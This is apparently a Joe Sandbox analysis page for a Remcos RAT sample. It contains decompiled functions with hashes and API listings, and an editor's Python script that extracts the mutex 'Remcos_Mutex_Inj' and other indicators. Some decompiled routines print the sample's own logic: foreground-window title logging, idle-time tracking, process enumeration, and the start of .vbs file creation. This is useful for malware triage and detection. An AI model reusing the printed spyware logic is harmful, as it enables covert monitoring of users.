                      • Opcode ID: 456ca889df31dbef7a0c01afc994c632b5298dbdffc8898aa66f44d16e0d6997
                      • Instruction ID: 0b963b3e7fc942958548b5c326f60d06956f211ca9dd2051e9aeb139bd9c243e
                      • Opcode Fuzzy Hash: 456ca889df31dbef7a0c01afc994c632b5298dbdffc8898aa66f44d16e0d6997
                      • Instruction Fuzzy Hash: FF617471900108EBCF14FFA0D89A9EDB77ABF51345F904169F916670A2EF3C6E4ACA50
                      Uniqueness

                      Uniqueness Score: -1.00%
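
The APIs and Strings listed for E0074CE44 already carry the triage-relevant facts: a snapshot-and-walk of the process list, one named mutex, and an OpenProcess inside helper 00757678 that asks for 0x1000 only, which is PROCESS_QUERY_LIMITED_INFORMATION. The script below is an added example written for this page, not code from the Joe Sandbox report or from the sample. It parses those lines in the report's own format, collects the mutex name and string constants as indicators, decodes the OpenProcess access mask, and flags whether any OpenProcess in the block requests injection-grade rights (VM_WRITE, VM_OPERATION or CREATE_THREAD). The sample input is copied from the block above; the PROCESS_* table is the documented Win32 set, and the classification rules are the editor's, not the report's.

```python
"""Pull indicators and a behaviour summary out of one Joe Sandbox function block.

Added example by the editor; not code from the report or from the sample. The only
format assumption is the report's own: "Name.MODULE(args), ref: ADDR", optionally
prefixed by "Part of subcall function XXXX:", plus a "$"-joined "String ID" line.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample input: the APIs / Strings lines of E0074CE44, copied from the block above.
SAMPLE_BLOCK = r"""
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,007AC578,00000000,00000001), ref: 0074CE5F
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0074CE85
• Process32FirstW.KERNEL32(00000000,?), ref: 0074CEA0
• Process32NextW.KERNEL32(0074C873,0000022C), ref: 0074CF11
• CloseHandle.KERNEL32(0074C873,?,00000000,?,?,?), ref: 0074CF1E
• CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 0074D034
• CloseHandle.KERNEL32(00000000), ref: 0074D096
  • Part of subcall function 00757678: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0075768D
Strings
• String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
""".strip("\n")

API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function\s+([0-9A-Fa-f]+):\s*)?"
                    r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")
STRINGS_RE = re.compile(r"^\s*•\s*String ID:\s*(.*)$")
HEX32_RE = re.compile(r"[0-9A-Fa-f]{8}")  # how the report prints DWORD arguments

# Documented Win32 PROCESS_* rights, ascending; bits outside this table are kept as raw hex.
PROCESS_ACCESS_BITS = [
    (0x0001, "PROCESS_TERMINATE"), (0x0002, "PROCESS_CREATE_THREAD"),
    (0x0008, "PROCESS_VM_OPERATION"), (0x0010, "PROCESS_VM_READ"),
    (0x0020, "PROCESS_VM_WRITE"), (0x0400, "PROCESS_QUERY_INFORMATION"),
    (0x1000, "PROCESS_QUERY_LIMITED_INFORMATION"),
]
# Rights needed to place code in another process and run it (WriteProcessMemory + CreateRemoteThread style).
INJECTION_GRADE = {"PROCESS_VM_WRITE", "PROCESS_VM_OPERATION", "PROCESS_CREATE_THREAD"}
TH32CS_SNAPPROCESS = 0x2


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None  # address of the helper the call was attributed to


def parse_block(text: str) -> Tuple[List[ApiCall], List[str]]:
    """Return (API calls in listed order, string constants) from one function block."""
    calls: List[ApiCall] = []
    strings: List[str] = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            sub, name, module, raw_args, ref = m.groups()
            args = [a.strip() for a in raw_args.split(",")] if raw_args else []
            calls.append(ApiCall(name, module, args, ref, sub))
            continue
        s = STRINGS_RE.match(line)
        if s and s.group(1):
            strings.extend(p for p in s.group(1).split("$") if p)
    return calls, strings


def dword(arg: str) -> Optional[int]:
    """Arguments are 8-hex-digit DWORDs, '?' when the sandbox could not resolve them, or an inlined string."""
    return int(arg, 16) if HEX32_RE.fullmatch(arg) else None


def decode_access(mask_hex: str) -> List[str]:
    """Decode an OpenProcess dwDesiredAccess mask into PROCESS_* names."""
    value = int(mask_hex, 16)
    names = [n for bit, n in PROCESS_ACCESS_BITS if value & bit]
    rest = value & ~sum(bit for bit, _ in PROCESS_ACCESS_BITS)
    return names + ([f"0x{rest:x}"] if rest else [])


def extract_iocs(calls: List[ApiCall], strings: List[str]) -> Dict[str, object]:
    """Named mutexes, the call sequence, and the rights the block requests on other processes."""
    mutexes = [c.args[2] for c in calls if c.name in ("CreateMutexA", "CreateMutexW")
               and len(c.args) >= 3 and c.args[2] != "?" and dword(c.args[2]) is None]
    snaps = any(c.name == "CreateToolhelp32Snapshot" and c.args
                and (dword(c.args[0]) or 0) & TH32CS_SNAPPROCESS for c in calls)
    walks = any(c.name.startswith("Process32Next") for c in calls)
    opens = {c.ref: decode_access(c.args[0]) for c in calls
             if c.name == "OpenProcess" and c.args and dword(c.args[0]) is not None}
    return {
        "mutexes": mutexes,
        "strings": strings,
        "api_sequence": [c.name for c in calls],
        "process_enumeration": snaps and walks,
        "open_process_access": opens,
        "injection_grade_access": any(INJECTION_GRADE & set(v) for v in opens.values()),
    }
```

Calling `extract_iocs(*parse_block(SAMPLE_BLOCK))` on this block yields `process_enumeration` True, `mutexes` `['Remcos_Mutex_Inj']` and `injection_grade_access` False: the loop opens processes only to query them, so this function is a lookup-and-gate routine, not the injection itself. Two caveats a practitioner should keep in mind: an argument printed as `?` is one the sandbox could not resolve, so a missing right here is absence of evidence rather than proof; and the mutex name is the cheapest thing to hunt for on a suspect host (for example `handle.exe -a Remcos_Mutex_Inj` from Sysinternals lists any process holding a handle whose name contains that string).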

                      C-Code - Quality: 97%
                      			// Statically linked MSVC CRT code, not sample logic: the body matches __init_monetary, which fills the
                      			// monetary fields of a struct lconv (offsets 0xc..0x4c) through a __getlocaleinfo-style helper (E0078B0F4)
                      			// and normalises mon_grouping in the digit loop below. Safe to skip when triaging the sample.
                      			E00788880(void* __edx, char _a4) {
                      				void* _v8;
                      				void* _v12;
                      				signed int _v16;
                      				intOrPtr* _v20;
                      				signed int _v24;
                      				char _v28;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t105;
                      				char _t195;
                      				char _t210;
                      				signed int _t213;
                      				void* _t224;
                      				char* _t226;
                      				signed int _t227;
                      				signed int _t231;
                      				signed int _t232;
                      				void* _t234;
                      				void* _t236;
                      				signed int _t237;
                      				signed int _t238;
                      				signed int _t239;
                      				signed int _t240;
                      				signed int _t241;
                      				signed int _t242;
                      				signed int _t243;
                      				signed int _t244;
                      				signed int _t245;
                      				signed int _t246;
                      				signed int _t247;
                      				signed int _t248;
                      				signed int _t249;
                      				signed int _t250;
                      				signed int _t251;
                      				signed int _t252;
                      				signed int _t253;
                      				signed int _t254;
                      				signed int _t255;
                      				signed int _t256;
                      				char* _t257;
                      
                      				_t224 = __edx;
                      				_t210 = _a4;
                      				_v16 = 0;
                      				_v28 = _t210;
                      				_v24 = 0;
                      				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
                      					_t234 = E0077F348(0, 1, 0x50);
                      					_v8 = _t234;
                      					E007801F5(0);
                      					if(_t234 != 0) {
                      						_t227 = E0077F348(0, 1, 4);
                      						_v12 = _t227;
                      						E007801F5(0);
                      						if(_t227 != 0) {
                      							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
                      								_t213 = 0x14;
                      								memcpy(_v8, 0x7aa188, _t213 << 2);
                      								L25:
                      								_t236 = _v8;
                      								_t231 = _v16;
                      								 *_t236 =  *( *(_t210 + 0x88));
                      								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
                      								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
                      								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
                      								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
                      								 *_v12 = 1;
                      								if(_t231 != 0) {
                      									 *_t231 = 1;
                      								}
                      								goto L27;
                      							}
                      							_t232 = E0077F348(0, 1, 4);
                      							_v16 = _t232;
                      							E007801F5(0);
                      							if(_t232 != 0) {
                      								_t233 =  *((intOrPtr*)(_t210 + 0xac));
                      								_t14 = _t234 + 0xc; // 0xc
                      								_t237 = E0078B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
                      								_t238 = _t237 | E0078B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
                      								_t239 = _t238 | E0078B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
                      								_t240 = _t239 | E0078B0F4(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
                      								_v20 = _v8 + 0x1c;
                      								_t241 = _t240 | E0078B0F4(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
                      								_t242 = _t241 | E0078B0F4(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
                      								_t243 = _t242 | E0078B0F4(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
                      								_t244 = _t243 | E0078B0F4(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
                      								_t245 = _t244 | E0078B0F4(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
                      								_t246 = _t245 | E0078B0F4(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
                      								_t247 = _t246 | E0078B0F4(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
                      								_t248 = _t247 | E0078B0F4(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
                      								_t249 = _t248 | E0078B0F4(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
                      								_t250 = _t249 | E0078B0F4(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
                      								_t251 = _t250 | E0078B0F4(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
                      								_t252 = _t251 | E0078B0F4(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
                      								_t253 = _t252 | E0078B0F4(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
                      								_t254 = _t253 | E0078B0F4(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
                      								_t255 = _t254 | E0078B0F4(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
                      								_t256 = _t255 | E0078B0F4(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
                      								if((E0078B0F4(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
                      									_t226 =  *_v20;
                      									while( *_t226 != 0) {
                      										_t195 =  *_t226;
                      										if(_t195 < 0x30 || _t195 > 0x39) {
                      											if(_t195 != 0x3b) {
                      												goto L17;
                      											}
                      											_t257 = _t226;
                      											do {
                      												 *_t257 =  *((intOrPtr*)(_t257 + 1));
                      												_t257 = _t257 + 1;
                      											} while ( *_t257 != 0);
                      										} else {
                      											 *_t226 = _t195 - 0x30;
                      											L17:
                      											_t226 = _t226 + 1;
                      										}
                      									}
                      									goto L25;
                      								}
                      								E00788782(_v8);
                      								E007801F5(_v8);
                      								E007801F5(_v12);
                      								E007801F5(_v16);
                      								goto L4;
                      							}
                      							E007801F5(_t234);
                      							E007801F5(_v12);
                      							L7:
                      							goto L4;
                      						}
                      						E007801F5(_t234);
                      						goto L7;
                      					}
                      					L4:
                      					return 1;
                      				} else {
                      					_t231 = 0;
                      					_v12 = 0;
                      					_t236 = 0x7aa188;
                      					L27:
                      					_t105 =  *(_t210 + 0x84);
                      					if(_t105 != 0) {
                      						asm("lock dec dword [eax]");
                      					}
                      					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
                      						asm("lock xadd [ecx], eax");
                      						if((_t105 | 0xffffffff) == 0) {
                      							E007801F5( *(_t210 + 0x88));
                      							E007801F5( *((intOrPtr*)(_t210 + 0x7c)));
                      						}
                      					}
                      					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
                      					 *(_t210 + 0x84) = _t231;
                      					 *(_t210 + 0x88) = _t236;
                      					return 0;
                      				}
                      			}

                      APIs
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0
                      • Opcode ID: 66978e8474050abbfbced647814a0ecbf68410a1513215a8e60dd891430f0ca6
                      • Instruction ID: 8b1ad90e82053e620e17fd14f5df5c6d4a1ad76a45f49da25a20990bff261f77
                      • Opcode Fuzzy Hash: 66978e8474050abbfbced647814a0ecbf68410a1513215a8e60dd891430f0ca6
                      • Instruction Fuzzy Hash: C3C146B1E80205EFDB60EBA8CC86FEE77F8AB44710F544165FA04FB282D674A9458761
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 41%
                      			// Statically linked MSVC CRT code, not sample logic: the body matches _wsopen_nolock (EMFILE == 0x18 when no
                      			// fd is free, GetFileType on the new handle, EACCES == 0xd fallback, per-fd flags kept in the lowio handle
                      			// table at 0x7ab800 indexed as [fd >> 6] + (fd & 0x3f) * 0x30). The listing is truncated at L28061.
                      			E0078F255(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                      				signed int _v5;
                      				char _v6;
                      				void* _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				char _v24;
                      				intOrPtr _v36;
                      				signed int _v44;
                      				void _v48;
                      				char _v72;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				signed int _t114;
                      				signed int _t123;
                      				signed char _t124;
                      				signed int _t134;
                      				intOrPtr _t164;
                      				intOrPtr _t180;
                      				signed int* _t190;
                      				signed int _t192;
                      				char _t197;
                      				signed int _t203;
                      				signed int _t206;
                      				signed int _t215;
                      				signed int _t217;
                      				signed int _t219;
                      				signed int _t225;
                      				signed int _t227;
                      				signed int _t234;
                      				signed int _t235;
                      				signed int _t237;
                      				signed int _t239;
                      				signed char _t242;
                      				intOrPtr _t245;
                      				void* _t248;
                      				void* _t252;
                      				void* _t262;
                      				signed int _t263;
                      				signed int _t266;
                      				signed int _t269;
                      				signed int _t270;
                      				void* _t272;
                      				void* _t274;
                      				void* _t275;
                      				void* _t277;
                      				void* _t278;
                      				void* _t280;
                      				void* _t284;
                      
                      				_t262 = E0078EFB8(__ecx,  &_v72, _a16, _a20, _a24);
                      				_t192 = 6;
                      				memcpy( &_v48, _t262, _t192 << 2);
                      				_t274 = _t272 + 0x1c;
                      				_t248 = _t262 + _t192 + _t192;
                      				_t263 = _t262 | 0xffffffff;
                      				if(_v36 != _t263) {
                      					_t114 = E00788575(_t248, _t263, __eflags);
                      					_t190 = _a8;
                      					 *_t190 = _t114;
                      					__eflags = _t114 - _t263;
                      					if(_t114 != _t263) {
                      						_v20 = _v20 & 0x00000000;
                      						_v24 = 0xc;
                      						_t275 = _t274 - 0x18;
                      						 *_a4 = 1;
                      						_push(6);
                      						_v16 =  !(_a16 >> 7) & 1;
                      						_push( &_v24);
                      						_push(_a12);
                      						memcpy(_t275,  &_v48, 1 << 2);
                      						_t197 = 0;
                      						_t252 = E0078EF23();
                      						_t277 = _t275 + 0x2c;
                      						_v12 = _t252;
                      						__eflags = _t252 - 0xffffffff;
                      						if(_t252 != 0xffffffff) {
                      							L11:
                      							_t123 = GetFileType(_t252);
                      							__eflags = _t123;
                      							if(_t123 != 0) {
                      								__eflags = _t123 - 2;
                      								if(_t123 != 2) {
                      									__eflags = _t123 - 3;
                      									_t124 = _v48;
                      									if(_t123 == 3) {
                      										_t124 = _t124 | 0x00000008;
                      										__eflags = _t124;
                      									}
                      								} else {
                      									_t124 = _v48 | 0x00000040;
                      								}
                      								_v5 = _t124;
                      								E007884BE(_t197,  *_t190, _t252);
                      								_t242 = _v5 | 0x00000001;
                      								_v5 = _t242;
                      								_v48 = _t242;
                      								 *( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
                      								_t203 =  *_t190;
                      								_t205 = (_t203 & 0x0000003f) * 0x30;
                      								__eflags = _a16 & 0x00000002;
                      								 *((char*)( *((intOrPtr*)(0x7ab800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                      								if((_a16 & 0x00000002) == 0) {
                      									L20:
                      									_v6 = 0;
                      									_push( &_v6);
                      									_push(_a16);
                      									_t278 = _t277 - 0x18;
                      									_t206 = 6;
                      									_push( *_t190);
                      									memcpy(_t278,  &_v48, _t206 << 2);
                      									_t134 = E0078ECD6(_t190,  &_v48 + _t206 + _t206,  &_v48);
                      									_t280 = _t278 + 0x30;
                      									__eflags = _t134;
                      									if(__eflags == 0) {
                      										 *((char*)( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                      										 *( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                      										__eflags = _v5 & 0x00000048;
                      										if((_v5 & 0x00000048) == 0) {
                      											__eflags = _a16 & 0x00000008;
                      											if((_a16 & 0x00000008) != 0) {
                      												_t225 =  *_t190;
                      												_t227 = (_t225 & 0x0000003f) * 0x30;
                      												_t164 =  *((intOrPtr*)(0x7ab800 + (_t225 >> 6) * 4));
                      												_t87 = _t164 + _t227 + 0x28;
                      												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                      												__eflags =  *_t87;
                      											}
                      										}
                      										_t266 = _v44;
                      										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
                      										if((_t266 & 0xc0000000) != 0xc0000000) {
                      											L31:
                      											__eflags = 0;
                      											return 0;
                      										} else {
                      											__eflags = _a16 & 0x00000001;
                      											if((_a16 & 0x00000001) == 0) {
                      												goto L31;
                      											}
                      											CloseHandle(_v12);
                      											_v44 = _t266 & 0x7fffffff;
                      											_t215 = 6;
                      											_push( &_v24);
                      											_push(_a12);
                      											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
                      											_t245 = E0078EF23();
                      											__eflags = _t245 - 0xffffffff;
                      											if(_t245 != 0xffffffff) {
                      												_t217 =  *_t190;
                      												_t219 = (_t217 & 0x0000003f) * 0x30;
                      												__eflags = _t219;
                      												 *((intOrPtr*)( *((intOrPtr*)(0x7ab800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
                      												goto L31;
                      											}
                      											E0077A4CE(GetLastError());
                      											 *( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                      											E00788687( *_t190);
                      											L10:
                      											goto L2;
                      										}
                      									}
                      									_t269 = _t134;
                      									goto L22;
                      								} else {
                      									_t269 = E0078F134(_t205,  *_t190);
                      									__eflags = _t269;
                      									if(__eflags != 0) {
                      										L22:
                      										E0078551E(__eflags,  *_t190);
                      										return _t269;
                      									}
                      									goto L20;
                      								}
                      							}
                      							_t270 = GetLastError();
                      							E0077A4CE(_t270);
                      							 *( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                      							CloseHandle(_t252);
                      							__eflags = _t270;
                      							if(_t270 == 0) {
                      								 *((intOrPtr*)(E0077A504())) = 0xd;
                      							}
                      							goto L2;
                      						}
                      						_t234 = _v44;
                      						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                      						if((_t234 & 0xc0000000) != 0xc0000000) {
                      							L9:
                      							_t235 =  *_t190;
                      							_t237 = (_t235 & 0x0000003f) * 0x30;
                      							_t180 =  *((intOrPtr*)(0x7ab800 + (_t235 >> 6) * 4));
                      							_t33 = _t180 + _t237 + 0x28;
                      							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                      							__eflags =  *_t33;
                      							E0077A4CE(GetLastError());
                      							goto L10;
                      						}
                      						__eflags = _a16 & 0x00000001;
                      						if((_a16 & 0x00000001) == 0) {
                      							goto L9;
                      						}
                      						_t284 = _t277 - 0x18;
                      						_v44 = _t234 & 0x7fffffff;
                      						_t239 = 6;
                      						_push( &_v24);
                      						_push(_a12);
                      						memcpy(_t284,  &_v48, _t239 << 2);
                      						_t197 = 0;
                      						_t252 = E0078EF23();
                      						_t277 = _t284 + 0x2c;
                      						_v12 = _t252;
                      						__eflags = _t252 - 0xffffffff;
                      						if(_t252 != 0xffffffff) {
                      							goto L11;
                      						}
                      						goto L9;
                      					} else {
                      						 *(E0077A4F1()) =  *_t186 & 0x00000000;
                      						 *_t190 = _t263;
                      						 *((intOrPtr*)(E0077A504())) = 0x18;
                      						goto L2;
                      					}
                      				} else {
                      					 *(E0077A4F1()) =  *_t188 & 0x00000000;
                      					 *_a8 = _t263;
                      					L2:
                      					return  *((intOrPtr*)(E0077A504()));
                      				}
                      			}

                      APIs
                        • Part of subcall function 0078EF23: CreateFileW.KERNEL32(00000000,00000000,?,0078F2FE,?,?,00000000,?,0078F2FE,00000000,0000000C), ref: 0078EF40
                      • GetLastError.KERNEL32 ref: 0078F369
                      • __dosmaperr.LIBCMT ref: 0078F370
                      • GetFileType.KERNEL32(00000000), ref: 0078F37C
                      • GetLastError.KERNEL32 ref: 0078F386
                      • __dosmaperr.LIBCMT ref: 0078F38F
                      • CloseHandle.KERNEL32(00000000), ref: 0078F3AF
                      • CloseHandle.KERNEL32(?), ref: 0078F4F9
                      • GetLastError.KERNEL32 ref: 0078F52B
                      • __dosmaperr.LIBCMT ref: 0078F532
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                      • String ID: H
                      • API String ID: 4237864984-2852464175
                      • Opcode ID: 1f25c5416e48e62591579cd89d5b8a1c87d1d0271d2dc451d8ced70c1a06108f
                      • Instruction ID: 2cb85bdb8a4405ed334b0207e85163b4933c274dbb5d134ed6b390314cb977b7
                      • Opcode Fuzzy Hash: 1f25c5416e48e62591579cd89d5b8a1c87d1d0271d2dc451d8ced70c1a06108f
                      • Instruction Fuzzy Hash: 66A15532A501489FDF18EF68D885BAE7BB0AB46320F14416AF815DB292DB3D8D12CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E00749195(void* __ecx, void* __edx) {
                      				char _v28;
                      				char _v56;
                      				char _v76;
                      				char _v80;
                      				char _v100;
                      				void* _v104;
                      				char _v108;
                      				char _v112;
                      				struct HWND__* _v116;
                      				void* __ebx;
                      				void* __edi;
                      				int _t36;
                      				struct HWND__* _t42;
                      				void* _t50;
                      				int _t57;
                      				struct HWND__* _t77;
                      				void* _t119;
                      				signed int _t125;
                      				void* _t127;
                      
                      				_t112 = __edx;
                      				_t127 = (_t125 & 0xfffffff8) - 0x74;
                      				_push(_t77);
                      				_push(0xea60);
                      				_t119 = __ecx;
                      				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                      					Sleep(0x1f4);
                      					_t77 = GetForegroundWindow();
                      					_t36 = GetWindowTextLengthW(_t77);
                      					_t4 = _t36 + 1; // 0x1
                      					E00749DEC(_t77,  &_v100, _t112, _t119, _t4, 0);
                      					if(_t36 != 0) {
                      						_t57 = E00742489();
                      						GetWindowTextW(_t77, E00741EEB( &_v100), _t57);
                      						_t112 = 0x7add0c;
                      						if(E00749EAC(0x7add0c) == 0) {
                      							E00749DD2(0x7add0c,  &_v100);
                      							E0074733F(E00742489() - 1);
                      							_t127 = _t127 - 0x18;
                      							_t136 =  *0x7ac39b;
                      							if( *0x7ac39b == 0) {
                      								_t112 = E00749E69( &_v76, L"\r\n[ ", __eflags,  &_v108);
                      								E007430A6(_t77, _t127, _t67, _t119, __eflags, L" ]\r\n");
                      								E00748B80(_t119);
                      								E00741EF0();
                      							} else {
                      								E00747350(_t77, _t127, 0x7add0c, _t136,  &_v108);
                      								E00749634(_t77, _t119, _t136);
                      							}
                      						}
                      					}
                      					_t83 = _t119;
                      					E00749C15(_t119);
                      					if(E007571D6(_t119) < 0xea60) {
                      						L18:
                      						E00741EF0();
                      						continue;
                      					} else {
                      						_t77 = _v116;
                      						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                      							_t42 = E007571D6(_t83);
                      							if(_t42 < 0xea60) {
                      								__eflags = _t77 % 0xea60;
                      								E0077BACE(_t83, _t77 / 0xea60,  &_v112, 0xa);
                      								_t50 = E00745343(_t77,  &_v80, E007475C2(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E00742084(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
                      								_t127 = _t127 + 0xc - 0x14;
                      								_t112 = _t50;
                      								E007572DA(_t127, _t50);
                      								E00748B80(_t119);
                      								E00741FC7();
                      								E00741FC7();
                      								E00741FC7();
                      								goto L18;
                      							}
                      							_t77 = _t42;
                      							_v116 = _t77;
                      							Sleep(0x3e8);
                      						}
                      						E00741EF0();
                      						break;
                      					}
                      				}
                      				__eflags = 0;
                      				return 0;
                      			}

                      APIs
                      • __Init_thread_footer.LIBCMT ref: 007491F7
                      • Sleep.KERNEL32(000001F4), ref: 00749202
                      • GetForegroundWindow.USER32 ref: 00749208
                      • GetWindowTextLengthW.USER32(00000000), ref: 00749211
                      • GetWindowTextW.USER32 ref: 00749245
                      • Sleep.KERNEL32(000003E8), ref: 00749313
                        • Part of subcall function 00749E69: char_traits.LIBCPMT ref: 00749E79
                        • Part of subcall function 00748B80: SetEvent.KERNEL32(?,?,?,?,00749CFC,?,?,?,?,?,00000000), ref: 00748BAD
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
                      • String ID: [ ${ User has been idle for $ ]$ minutes }
                      • API String ID: 107669343-3343415809
                      • Opcode ID: 44cf885aa7fc333b70f02c3254c6e23d40a49a7fd1ac3f528992739636166d6f
                      • Instruction ID: 1baea5466234d313443e3f684630671cfac41be4afc6dd20dd09166d047d4215
                      • Opcode Fuzzy Hash: 44cf885aa7fc333b70f02c3254c6e23d40a49a7fd1ac3f528992739636166d6f
                      • Instruction Fuzzy Hash: 9F51E371208240ABC714FB64D88AA6FB7A5BFC5310F400A2DFA47D65D2EF6C9E46C652
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0074B488(void* __ebx, void* __eflags) {
                      				char _v28;
                      				char _v52;
                      				char _v76;
                      				char _v100;
                      				char _v124;
                      				char _v148;
                      				char _v172;
                      				char _v196;
                      				short _v716;
                      				void* __edi;
                      				void* __ebp;
                      				void* _t36;
                      				void* _t37;
                      				void* _t40;
                      				void* _t54;
                      				void* _t67;
                      				void* _t68;
                      				void* _t79;
                      
                      				_t79 = __ebx;
                      				E0075015B();
                      				_t36 = E00742489();
                      				_t37 = E00741F95(0x7ac560);
                      				_t40 = E00750A30(E00741F95(0x7ac518), "exepath",  &_v716, 0x208, _t37, _t36);
                      				_t140 = _t40;
                      				if(_t40 == 0) {
                      					GetModuleFileNameW(0,  &_v716, 0x208);
                      				}
                      				E007430A6(_t79,  &_v124, E007572DA( &_v52, E00757093( &_v76)), 0, _t140, L".vbs");
                      				E00741EF0();
                      				E00741FC7();
